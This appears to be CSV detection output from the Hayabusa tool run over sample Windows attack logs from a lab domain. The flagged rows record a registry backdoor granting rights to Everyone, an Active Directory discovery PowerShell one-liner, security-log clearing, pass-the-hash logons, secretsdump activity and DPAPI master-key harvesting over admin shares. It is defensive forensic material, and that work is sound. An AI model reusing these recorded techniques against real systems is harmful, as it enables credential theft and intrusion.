ParameterBinding(Add-Member): name=""Name""; value=""ComputerName"" ParameterBinding(Add-Member): name=""Value""; value=""FS03"" ParameterBinding(Add-Member): name=""InputObject""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.666 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-Member): ""Add-Member"" ParameterBinding(Add-Member): name=""MemberType""; value=""NoteProperty"" ParameterBinding(Add-Member): name=""Name""; value=""BackdoorTrustee"" ParameterBinding(Add-Member): name=""Value""; value=""S-1-1-0"" ParameterBinding(Add-Member): name=""InputObject""; value=""@{ComputerName=FS03}""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.666 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""@{ComputerName=FS03; BackdoorTrustee=S-1-1-0}""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-12 06:56:59.657 +00:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,"foreach ($s in [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Sites ){write-host ""[>] (site) $s"";foreach ($r in $s.Subnets){write-host "" └─> (subnet) $r"";foreach ($m in $s.Servers){write-host "" └─> (server) $m""}}}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" +2021-12-12 06:56:59.657 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Host): ""Write-Host"" ParameterBinding(Write-Host): name=""Object""; value=""[>] (site) OFFSEC-PREMISE""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" +2021-12-12 06:56:59.673 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Host): ""Write-Host"" ParameterBinding(Write-Host): name=""Object""; value=""[>] (site) 
LONDON""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" +2021-12-12 06:56:59.673 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" +2021-12-12 06:56:59.673 +00:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" +2021-12-12 07:15:28.352 +00:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: hack1,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.716 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:15:56.716 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx +2021-12-12 07:15:56.724 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:15:56.724 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:15:56.724 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8723c99,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.724 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.724 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.740 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 
07:15:56.740 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.756 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.782 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.782 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.782 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.782 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.797 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.817 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8723c99 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.829 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.929 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.929 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\ZuExrArX.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:56.929 +00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:58.454 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x33c | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.403 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.403 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\XwYybEmH.tmp | IP Addr: 
10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.403 +00:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.693 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.693 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.693 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.709 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect | IP Addr: 
10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.714 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.716 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.716 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.716 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\1d0d5e15-3dd4-4689-a6c8-b3f4a523f317 | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.732 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.732 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.732 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\4940c1c2-798b-4291-9cbf-56ba1bc56acd | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.748 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\dd10a8dd-2e01-4512-9e4e-0ab8b174b115 | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.750 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.750 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.750 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.750 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.769 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.769 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.769 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.769 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.769 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx +2021-12-12 07:15:59.769 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.784 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.784 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.784 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234\eca8ffbf-fcd6-4e81-a424-36116606541f | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.800 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\Public\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.802 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.802 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.802 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.802 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:15:59.818 
